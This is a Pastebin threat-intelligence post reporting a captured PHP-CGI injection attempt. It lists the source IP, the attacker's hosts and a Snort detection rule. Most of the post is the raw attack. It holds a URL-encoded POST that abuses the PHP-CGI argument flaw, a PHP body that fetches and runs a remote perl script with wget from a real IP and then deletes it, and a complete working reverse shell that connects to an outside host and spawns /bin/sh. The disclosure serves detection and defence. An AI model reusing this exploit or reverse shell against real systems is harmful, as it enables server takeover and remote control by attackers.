Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- PHP Injection Attempt
- Reported by neonprimetime security
- http://neonprimetime.blogspot.com
- *****
- Source IP: 212.93.4.20
- *****
- Payload:
- 178.254.32.171
- 91.121.107.56
- 91.121.105.21
- http://91.121.107.56/MSI/AT/.o/hb/php02
- *****
- Rule alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP PHP-CGI remote file include attempt"; flow:to_server,established; content:"auto_prepend_file"; http_uri; metadata:policy balanced-ips drop, policy security-ips drop, ruleset community, service http; reference:cve,2012-1823; reference:cve,2012-2311; reference:cve,2012-2335; reference:cve,2012-2336; classtype:attempted-admin; sid:22063; rev:9; )
- POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
- <?php system("wget 91.121.107.56/MSI/AT/.o/hb/php02 -O /tmp/.0e1bc.log;perl /tmp/.0e1bc.log 178.254.32.171;rm -rf /tmp/.0e1bc.log &"); ?>set_time_limit(0);
- $ip = '91.121.105.21';
- $port = 22;
- $chunk_size = 1400;
- $write_a = null;
- $error_a = null;
- $shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';
- $daemon = 0;
- $debug = 0;
- if (function_exists('pcntl_fork')) {
- .$pid = pcntl_fork();.
- .if ($pid == -1) {
- ..printit("ERROR: Can't fork");
- ..exit(1);
- .}
- .if ($pid) {
- ..exit(0);
- .}
- .if (posix_setsid() == -1) {
- ..printit("Error: Can't setsid()");
- ..exit(1);
- .}
- .$daemon = 1;
- } else {
- .printit("WARNING: Failed to daemonise.");
- }
- chdir("/");
- umask(0);
- $sock = fsockopen($ip, $port, $errno, $errstr, 30);
- if (!$sock) {
- .printit("$errstr ($errno)");
- .exit(1);
- }
- $descriptorspec = array(
- 0 => array("pipe", "r"),
- 1 => array("pipe", "w"),
- 2 => array("pipe", "w")
- );
- $process = proc_open($shell, $descriptorspec, $pipes);
- if (!is_resource($process)) {
- .printit("ERROR: Can't spawn shell");
- .exit(1);
- }
- stream_set_blocking($pipes[0], 0);
- stream_set_blocking($pipes[1], 0);
- stream_set_blocking($pipes[2], 0);
- stream_set_blocking($sock, 0);
- while (1) {
- .if (feof($sock)) {
- ..printit("ERROR: Shell connection terminated");
- ..break;
- .}
- .if (feof($pipes[1])) {
- ..printit("ERROR: Shell process terminated");
- ..break;
- .}
- .$read_a = array($sock, $pipes[1], $pipes[2]);
- .$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
- .if (in_array($sock, $read_a)) {
- ..if ($debug) printit("SOCK READ");
- ..$input = fread($sock, $chunk_size);
- ..if ($debug) printit("SOCK: $input");
- ..fwrite($pipes[0], $input);
- .}
- .if (in_array($pipes[1], $read_a)) {
- ..if ($debug) printit("STDOUT READ");
- ..$input = fread($pipes[1], $chunk_size);
- ..if ($debug) printit("STDOUT: $input");
- ..fwrite($sock, $input);
- .}
- .if (in_array($pipes[2], $read_a)) {
- ..if ($debug) printit("STDERR READ");
- ..$input = fread($pipes[2], $chunk_size);
- ..if ($debug) printit("STDERR: $input");
- ..fwrite($sock, $input);
- .}
- }
- fclose($sock);
- fclose($pipes[0]);
- fclose($pipes[1]);
- fclose($pipes[2]);
- proc_close($process);
- function printit ($string) {
- .if (!$daemon) {
- ..print "$string
- ";
- .}
- }
- exit(1);
- ?>
Add Comment
Please, Sign In to add comment
